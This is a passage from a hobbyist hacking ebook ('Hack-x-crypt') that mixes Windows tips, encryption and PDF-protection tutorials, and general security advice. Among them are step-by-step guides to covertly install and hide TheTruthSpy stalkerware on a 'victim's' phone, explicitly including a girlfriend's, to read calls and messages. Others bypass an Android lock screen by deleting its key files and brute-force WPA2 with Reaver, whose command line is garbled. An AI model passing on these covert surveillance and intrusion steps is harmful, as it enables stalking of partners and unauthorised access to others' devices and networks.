used Windows Defender, it’s also worth performing a full system scan
by selecting Full from the Scan options list on the Home tab and clicking
the Scan now button.

UJJWAL SAHAY
117 Hack-x-crypt

Defrag your disk

Although there are lots of things that can slow down your PC and make
Windows slow to start, one of the easiest to sort out is fragmentation
of the hard disk. You don’t need any third-party tools to do the job
either, since Windows provides all you need. It could take quite some
time, though, and it’ll affect performance while it’s running, so set it
going when you’re not going to be using your PC. Just search for Disk
Defragmenter in the Start menu.

Don’t take a risk

The Windows firewall protects your PC from malicious attention over

the internet. Normally it’s turned on but you might have turned it off,
perhaps because you thought it might have been responsible for

UJJWAL SAHAY
118 Hack-x-crypt

something not working correctly. If you forgot to turn it on again, then

your PC could be at risk. Turn it back on again at Control Panel >
System and Security > Windows Firewall.

Hide the taskbar

Sometimes you need the absolute maximum amount of screen space

available. The taskbar at the bottom of the screen uses valuable space
that you might want to put to better use. To hide it, right-click on the
taskbar and select Properties to display the Taskbar and Start
Menu Properties dialog box. On the Taskbar tab, select ‘Auto-hide the
taskbar’. The taskbar will now disappear; when you do need it, just
moving the cursor to the bottom of the screen will summon it.

Use of picture password

If you don’t want to type in a password every time you use your PC, you
can use a picture as a password instead.

On the Sign-in options screen, click Add under Picture password and
choose a picture from your PC to use as a password.

Once a picture has been chosen, you’ll be taken through the process of
drawing three different (and memorable) gestures anywhere on it using
the touchscreen, mouse or track pad. You’ll then need to repeat all
three gestures to log into your user account, but you can still use your
usual password.

UJJWAL SAHAY
119 Hack-x-crypt

ENCRYPTION THROUGH MINILOCK

UJJWAL SAHAY
120 Hack-x-crypt

What is encryption?

Encryption is a way to enhance the security of a message or file by

scrambling the contents so that it can be read only by someone who
has the right encryption key to unscramble it. For example, if you
purchase something from a website, the information for the
transaction (such as your address, phone number, and credit card
number) is usually encrypted to help keep it safe. Use encryption when
you want a strong level of protection for your information.

What is Encrypting File System (EFS)?

Encrypting File System (EFS) is a feature of Windows that you can use to
store information on your hard disk in an encrypted format. Encryption
is the strongest protection that Windows provides to help you keep
your information secure.

Some key features of EFS:

 Encrypting is simple; just select a box in the file or folder's

properties to turn it on.
 You have control over who can read the files.
 Files are encrypted when you close them, but are automatically
ready to use when you open them.
 If you change your mind about encrypting a file, clear the box in
the file's properties.

UJJWAL SAHAY
121 Hack-x-crypt

This is what MINILOCK looks like once it has generated a public key.

The encryption scheme that miniLock employs is Curve25519 elliptic-

curve cryptography, which is the same type of cryptography that
Cryptocat uses. However, the problem with encryption tools often isn’t
the strength of their encryption, but how well the encryption is
implemented. Judging the quality of the cryptography is beyond the
scope of this article. But on the miniLock site (minilock.io), you can find
a recent miniLock security audit by penetration-testing firm Cure53.
The report gave miniLock a clean bill of health. For anyone who wants
to dive in right away, here’s a quick hands on tour of miniLock on a
Windows 8.1 PC.

UJJWAL SAHAY
122 Hack-x-crypt

Generating your ID

To get started, visit the Chrome Web Store (tinyurl.com/p86q7nr) and

install miniLock as you would any other Chrome app. Then you can
either launch it right from the Chrome Web Store or via the Chrome
App Launcher in your taskbar, if you’ve installed that. When it starts up,
miniLock will ask you to sign in with your email address and a
passphrase. The app will use this information to generate your miniLock
ID, which should take only a second or two.
MiniLock was fairly picky about passphrases. I tried using a 10-character
randomly generated passphrase with capital and lowercase letters,
numbers, and special characters. That should make for a fairly solid
password, but for miniLock it wasn’t strong enough.
Instead, the app suggested that we use one of its auto-generated
passphrases, which consist of a series of random dictionary words. To
make things easier, I used one of the passphrases generated by
miniLock, but you could also write your own. Just make sure it’s unique
and memorable enough that you won’t forget it. Otherwise, storing it in
a password manager will be important. As with other encryption tools,
if you lose that passphrase, you won’t be able to unlock any files sent to
you with that miniLock ID.

Now i show you how to set up your ID, we’ll walk through how to
encrypt a file so you can see how it works. Make sure you back up the
test file in unencrypted form just in case something goes wrong.

UJJWAL SAHAY
123 Hack-x-crypt

You’ll see the above image when a file is ready for ENCRYPTION.

To choose a file, either tap the file-drop area in the miniLock window or
drag a file from File Explorer and drop it in the window.
The application’s window will then flips around and reveal space for
entering up to four miniLock IDs.

By default, your miniLock ID will appear at the top, as you are the
person encrypting the file. Below that, you’ll have the option to add
another three people you want to be able to access the encrypted the
file – assuming you have their miniLock ID. If you wanted to send this
file to one person and didn’t want to have access to it yourself, simply
click the X to the far right of your miniLock ID to remove your key.

UJJWAL SAHAY
124 Hack-x-crypt

You also have an option underneath the filename to have miniLock to

create a random filename – something you might do if you want to be
really secretive about what you’re sending.
Once the IDs for every recipient are ready to go, tap the arrow at the
bottom of the window to start the encryption process. Depending on
the size of the file, it could take a few seconds or a few minutes to
finish.
After the encryption is done, the app will tell you “Your encrypted file is
ready” in small letters below the filename.
Next, click on the filename to save the file to your PC via Chrome’s
downloads manager.
Now that you have an encrypted file, you can send it to the intended
recipients any way you like: email, instant message, USB key, Facebook;
the choices are seemingly endless.

Decrypting

Decrypting a file is even easier than encrypting. Once you receive your
miniLock-encrypted file via email (or whatever method), download it to
your PC and drop it into the miniLock window. As long as you are signed
in to miniLock and the file is encrypted with your miniLock ID, the file
will be automatically decrypted. Then you can save it to your PC the
same way you did with the encrypted file.
That’s about all there is to miniLock. The only drawback that some
people might find is that you have to sign-in every time you open the
app. MiniLock does not save your login across user sessions. That was
likely a conscious choice to protect your privacy.

UJJWAL SAHAY
125 Hack-x-crypt

HOW TO PROTECT YOUR PDF FILES

FROM COPYING

Now these days it’s a big deal to secure your PDF documents. In this
article I will show you that “HOW TO PROTECT YOUR PDF FILES FROM
BEING COPIED FOR PIRATION AND OTHER MALITIOUS INTENTIONS”.

For protecting your PDF files you can use a tool “A-PDF password
security” to protect a PDF file. You can set password and prevent
people from copy and paste PDF contents, here is an easy tutorial to
make you aware about the use of that tool.

 Install the “A-PDF password security”.

 Launch the program and open the password protect wizard.

UJJWAL SAHAY
126 Hack-x-crypt

 select the option “single pdf document security” and push the
button “next>”
 Click “browse” button to open a pdf file will be encrypted, select
the security level and encryption method. You can setup
password for opening and modification of your document.

 Click “save” or “save as” to set a document open password and

disallow copying permission.

UJJWAL SAHAY
127 Hack-x-crypt

 After saving the file you will choose to open saved PDF file with
the default PDF viewer, set another PDF file security or open
destination folder in windows explorer.

UJJWAL SAHAY
128 Hack-x-crypt

 Open saved PDF file with the default PDF viewer.

UJJWAL SAHAY
129 Hack-x-crypt

HOW TO SEND A MESSAGE TO

ANOTHER USER ACCOUNT IN YOUR PC
In this article we are going to learn that how to send any message to
the other user account associated with your own pc.

Let’s assume if you want to leave any message for your brother and
sister who have user accounts associated with the same pc in which
you have also a user account.

So follow these steps to pass any message which you to another user
account at his next login.

 Open the task manager of your pc by clicking CTRL+ALT+DEL keys

simultaneously.
 Then click on user option to view the available user account
associated with your pc.

UJJWAL SAHAY
130 Hack-x-crypt

 Select any another user account which you want to pass the
message.
 Then click on the “send message” option place in the lower right
corner.

 A dialogue box will be open after you.

 Type any message you want to convey them.
 If you want to shock them then you can type “HELLO
USER…YOUR COMPUTER IS INFECTED BY TROJAN”
 And when another user login to his/her user account, the same
message will be displayed to him.

UJJWAL SAHAY
131 Hack-x-crypt

HOW TO CREATE A FOLDER WITH

EMPTY NAME
This is the most interesting article of this book, and here I will show
you that how no create a folder without naming it. Sometimes it will
be very useful for you.

Let’s assume you have hided any folder simply. And when you will
search it by name from the address bar it will be opened easily.

So let’s think that if there will be any folder without name then how can
it be possible to search it from address bar or search box.

So follow these steps to create a folder without name:-

 Open the location where you want to create the folder.

 Just right click anywhere to create the folder.

UJJWAL SAHAY
132 Hack-x-crypt

 When it asks to rename the folder just click ALT key and by keep
pressing the ALT key press “2, 5, 5” one by one.
 And then enter.
 You will find that there it creates a folder without having any
name.

UJJWAL SAHAY
133 Hack-x-crypt

HACKING ANDROID PHONE

Hello friends, now in this article we will learn that how to spy over an
android phone. Now these days are the era of smart phones based on
android specially. In this article I will show you that how to get the
details of the victim by spying over victim’s android phone. This is the
best way to keep tracking your child and also your girlfriends.

For spying now I am using a tool name as THE TRUTH SPY.

UJJWAL SAHAY
134 Hack-x-crypt

By using this tool you can easily keep tracking the victim’s android
phone.

I am showing you the screen shots of those things which we can spy
from an android phone…such as CALL HISTORY, WHATSAPP
MESSAGES, and SMS DETAILS etc. …list is shown below in the
screenshot.

UJJWAL SAHAY
135 Hack-x-crypt

UJJWAL SAHAY
136 Hack-x-crypt

Note:- this tool is also available for IOS devices.

You have to follow the steps to start spying.

 First of all you have to download the apk file of this tool and
install it on the victim’s android phone and log into it.
 This tool is only of 800kb so you can easily manage it within
seconds.

UJJWAL SAHAY
137 Hack-x-crypt

 A very interesting thing is about this tool is that you can also hide
this tool from the victims android phone.so that victim will not
aware about it.
 Now you can download the apk file from the website
(my.thetruthspy.com).
 After installing the app go on the same website of the app by
your computer and resister using your email id and login to view
the details of the victim’s android phone.
 For getting details get ensure that the data connection of the
victims phone should be ON.
 When you want to unhide the app from the victim’s phone just
make a call from the victim’s phone to #2013*.

Note: - sometimes this “thetruthspy” is stop working.so you can also

search any other spy tool by simple Google searches. You will find a
lot of tools like this and have almost same functioning.

UJJWAL SAHAY
138 Hack-x-crypt

FULL CONTROL YOUR PC BY PHONE

Now I have a very interesting thing for you ……I know you got tired by
those difficult hackings chapters mentioned in above chapters.

In this article I are going to tell you that how to control your computer
fully by your mobile phone. It’s a very interesting thing for you if you
got tired by using the track pad and keyboard of your computer.

So let’s see how to do it:-

In this article I am going to use a tool name as UNIFIED REMOTE which

is used to remote our pc.

UJJWAL SAHAY
139 Hack-x-crypt

Unified remote is an app that lets you control your entire windows
computer from your android device.it turns your device into a Wi-Fi or
Bluetooth remote control for all the programs on your computer. With
this app you can control a wide range of applications, including simple
mouse and keyboard, media players and other external gadgets that
can be connected to your computer(such as USB-UIRT and tell stick). it
even provides extensive capabilities for users to create their own
custom remotes for their needs.

You have to follow the simple steps to remote your pc by unified

remote:-

 Download and install the unified remote server on your

computer (windows). You can easily find it by your Google
searches. When you installed it …..Launch it.
 Connect your android phone to the same Wi-Fi network as your
computer. Alternatively if your computer id Bluetooth ready, pair
it with your phone.
 Download and install the apk file of unified remote from the play
store.
 At launch, confirm that you have installed the server.
 Then add a new server, select “automatic” and the app will find
your computer.
 Tap your computers name to connect.
 Now you are ready to start controlling your computer with
phone.
 Tap remote in the app.

UJJWAL SAHAY
140 Hack-x-crypt

 The “Basic input” remote will prompt the mouse, which you can
use as a track pad.
 Instructions for using the mouse will appear on screen.
 Also there are lot of options are available by which you can
control your computer in different ways.

UJJWAL SAHAY
141 Hack-x-crypt

 Example:- keyboard controlling, file manager, media, power,

start, YouTube etc.

UJJWAL SAHAY
142 Hack-x-crypt

LAUNCHING WINDOWS GOD MODE

Here I have a nice windows trick for you which saves your much time.
In this article we will learn that how to launch GOD MODE in your
computer.

Windows god mode is a simple way to centralized access all the

administrative options that are normally seen inside control panel into
a newly created folder which can be placed anywhere inside computer.
Usually the administrative options are seen scattered inside the
control panel arranged in different categories and sub categories.
Windows god mode arranges all the administrative options inside one
single window. You find it much more neatly arranged and user
friendly.

UJJWAL SAHAY
143 Hack-x-crypt

Let’s see how to launch god mode in simple steps:-

 You need to create a new folder for this launch.
 Right click at the window where you want to create a new folder.
 When it asks you to rename that folder you have to enter
following codes with any word.

Example:- Ujjwal.{ ED7BA470-8E54-465E-825C-99712043E01C }

Or
Saurabh.{ ED7BA470-8E54-465E-825C-99712043E01C }
Or
Anything.{ ED7BA470-8E54-465E-825C-99712043E01C }

UJJWAL SAHAY
144 Hack-x-crypt

 Don’t forget to use curly brackets.

 After renaming the folder press enter.

 And you will see that the icon of that folder will be changed and
when you will open it you will find all the settings arranged in
well manner in it.

UJJWAL SAHAY
145 Hack-x-crypt

HOW TO CRACK ANDROID LOCK SCREEN

In this article we are going to learn that how to bypass the android lock
screen.

We are going to bypass the lock screen using a tool name as Aroma File
manager.

UJJWAL SAHAY
146 Hack-x-crypt

This is the best method for crack android pattern lock; you must have
custom recovery installed on your device in order to use this method.
Let’s start the cracking android lock screen.

 First of all download Aroma File manager zip file. Google it and
you will find it easily.

 Now copy this Aroma file manager zip to root of your SD card.
After copying zip file to SD, boot your phone into Recovery mode

UJJWAL SAHAY
147 Hack-x-crypt

(Each phone has different key combination to boot up in recovery

mode, you can search it on Google).
 In recovery choose “install zip from SD card or apply update from
SD card”, now select Aroma.zip which you have downloaded
earlier.
 After installing or updating Aroma file manager will open, use
volume up and down keys for Scrolling as you do in recovery.
 In Aroma file manager go to menu which is located at bottom
strip after clicking menu select settings. Go to bottom in settings
and then select “mount all partitions in startup” after mounting
exit Aroma file manager.
 Now launch Aroma file manager again.
 In aroma Go to Data>>System.
You will find “Gesture.key” if you have applied gesture lock or
“Password.key” if you have applied password.

 Long press “Gesture.key” or “Password.key” which one is

available, after long pressing it will prompt some option, choose
delete and delete that file and restart your device(first exit from
aroma file manager then restart your phone).
 Yuppie! Your phone is unlocked now. After rebooting it will ask
you for lock pattern don’t worry now you can use any pattern,
your old pattern has gone away.

UJJWAL SAHAY
148 Hack-x-crypt

WI-FI CRACKING USING REAVER IN

BACKTRACK

Well, in this article I will show you that how to crack WPA2-PSK key
using a tool names as REAVER. Reaver use to crack the key by brute
force method.

Let’s see how to crack the key using Backtrack.

Now I am using Backtrack 5r3.

 So open the console and follow the given steps:-

 First thing is to do is run the command : -
Airmon-ng start wlan0

UJJWAL SAHAY
149 Hack-x-crypt

 Now the next command to write is: -

Airodump-ng wlan0

With this command we look for available networks and

information regarding BSSID, PWR Beacons, data, channel etc…

 Now you need to run the following code:

Reaver -i mon0 -b -c BSSID –c channel network name

Note: - Use the values of BSSID channel and network name in

the above command.

I have executed the command and it starts to work as shown in

the picture below:-

UJJWAL SAHAY
150 Hack-x-crypt

Now you have to wait, time taken is dependent on the strength of

password and the speed of your internet connection,
And finally after brute forcing it will give you the WPA2 pin.

UJJWAL SAHAY
151 Hack-x-crypt

TIPS FROM ANTI-VIRUS COMPANIES TO

MAKE YOUR COMPUTER SECURE

1. Check Your Firewall

Checking your firewall sounds complicated, but it really isn’t. If you own
a Windows-based system, just go to your control panel and type
“firewall” in the search box. If your firewall is “on” or “connected” then
you’re good to go. If you own a Mac, click the Apple icon on your
toolbar, go to “system preferences,” then “security,” then “firewall”
Making sure you have a firewall in place can go a long way toward
keeping criminals out. Make sure that you share some of your folders
only on the home network. If you don’t really need your files to be
visible to other machines, disable file and media sharing completely.

2. Back Up Your Data

Backing up your data protects you in the event of a computer crash or

electrical outage or surge, like a lightning storm might produce. It also
helps if you fall prey to the newer type of ransomware, which encrypts
your sensitive data. You can do your back-up manually by transferring
important documents to an external hard drive, or using a service like
Carbonite. If you don’t have a significant amount of data to store, use a

UJJWAL SAHAY
152 Hack-x-crypt

service like Dropbox, where you get 2GB of storage for free. Antiviruses
like Kaspersky PURE has backup functionality as well, including Dropbox
integration.

3. Stay Away From Rogue Websites

Spotting a rogue website can be difficult, but there are a few things you
can do to hone your skills. Look for a green lock in the address bar and
the code prefix “https://” at the beginning of the URL while visiting
banking sites, entering your credit card data or accessing your web
mail. Be careful when shopping at a website that ships items from
overseas, and don’t click on links sent to you in email messages, go
directly to the website itself instead.

4. Avoid Deals That Are Too Good to Be True

If you see a deal for 90% off The Beatles Collection CD, it very well
could be a knock off. Even worse, some sites are known to lure
customers in with an amazing deal, and once they have your credit card
information they’re never to be heard from again – your identity may
be compromised and there’s not even a product to show for it. The
simple rule of thumb here is: If it looks too good to be true then it
probably is.

UJJWAL SAHAY
153 Hack-x-crypt

5. Never Divulge Sensitive Information

No matter what website you’re on be careful of the sensitive

information you reveal. Although it’s pretty much common knowledge
not to give out your social security number or credit card information
unless you trust a website completely, you should be just as careful
with your social media profiles as well .Revealing information as
innocent as your pet’s name or mother’s maiden name could lead to
identity theft, because you probably use the same data as the security
question on some other website.

6. Avoid Opening Unknown Emails

Never open an email from an unknown or suspicious source, and

definitely never open any attachments contained in them. You have to
be careful of emails coming from people on your contact list as well,
especially if the sender’s account has been hacked. If an email from
someone you regularly communicate with has a suspicious link and
unusual content, delete it and immediately alert this person that his or
her account may have been compromised. This will help you prevent
hacking and phishing scams where you may be a target.

UJJWAL SAHAY
154 Hack-x-crypt

SOME USEFUL WINDOWS SHORTCUTS

1. Windows Key + Tab : Aero

2. Windows Key + E : Launches Windows Explorer
3. Windows Key + R : Run Command box
4. Windows Key + F : Search
5. Windows Key + X : Mobility Center
6. Windows Key + L : Lock Computer
7. Windows Key + U : Ease of Access box
8. Windows Key + P : Projector
9. Windows Key + T : Cycle Super Taskbar Items
10. Windows Key + S : OneNote Screen Clipping Tool
11. Windows Key + M : Minimize All Windows
12. Windows Key + D : Show/Hide Desktop
13. Windows Key + Up : Maximize Current Window
14. Windows Key + Down : Restore Down / Minimize
15. Windows Key + Left : Tile Current Window to the Left
16. Windows Key + Right : Tile Current Windows Right
17. Windows Key + # (any number)
18. Windows Key + =: Magnifier
19. Windows Key + Plus : Zoom in
20. Windows Key + Minus : Zooms out
21. Windows Key + Space : Peek at the desktop

UJJWAL SAHAY
155 Hack-x-crypt

HOW TO RECOVER PERMANENTLY

DELETED FILES

In this article we will learn that how to recover our permanently

deleted files from our computer. Sometimes your important data is
accidently deleted from your computer as well as from recycle bin also,
and it’s very important to recover that file or data.

So here I am using a tool name as “stellar phonix windows data

recovery” to recover the permanently deleted files.

UJJWAL SAHAY
156 Hack-x-crypt

By using this tool you can recover your accidently deleted data from
your computer.

For it you have to follow simple steps as mentioned below: -

 Click on the option “deleted file recovery” or “folder recovery”

according to your choice.
 Then choose the local drive from where you want to scan for the
deleted files/folder.
 Then it asks you for a quick scan or deep scan, you can choose as
according to your need.

UJJWAL SAHAY
157 Hack-x-crypt

 After that it scans for all the deleted files/folder from your
particular selected local drive.
 And show you the list of the entire folder from which files are
deleted.

UJJWAL SAHAY
158 Hack-x-crypt

 Then you have to select your deleted file/folder which you want
to recover, as I have selected here “hacking tools” from the folder
“vi”.
 And then click on the recover option to recover your data
successfully.

Note: - The recovered data will work only when the

address of that location is empty/not overwritten from
where that file/folder is deleted accidently.

UJJWAL SAHAY
159 Hack-x-crypt

CONCLUSION: -
Thanks For reading this book and I hope the
contents described in this book will help you to know
the intents of hackers. Now you are capable of
securing your own and your surrounding computers,
mobile phones and other networks from the Threat
we called “HACKING- An art of exploitation ”.

BIBLIOGRAPHY

Various www.blogspot.com Blogs

www.google.com
www.wikipedia.com
www.elcomsoft.com
Pc advisor
www.microsoft.com
Hacking for dummies
Hacking exposed
Hacking crux
XDA developers
Etc.

UJJWAL SAHAY
 This book was distributed courtesy of:

For your own Unlimited Reading and FREE eBooks today, visit:
http://www.Free-eBooks.net

Share this eBook with anyone and everyone automatically by selecting any of the
options below:

To show your appreciation to the author and help others have

wonderful reading experiences and find helpful information too,
we'd be very grateful if you'd kindly
post your comments for this book here.

COPYRIGHT INFORMATION

Free-eBooks.net respects the intellectual property of others. When a book's copyright owner submits their work to Free-eBooks.net, they are granting us permission to distribute such material. Unless
otherwise stated in this book, this permission is not passed onto others. As such, redistributing this book without the copyright owner's permission can constitute copyright infringement. If you
believe that your work has been used in a manner that constitutes copyright infringement, please follow our Notice and Procedure for Making Claims of Copyright Infringement as seen in our Terms
of Service here:

http://www.free-ebooks.net/tos.html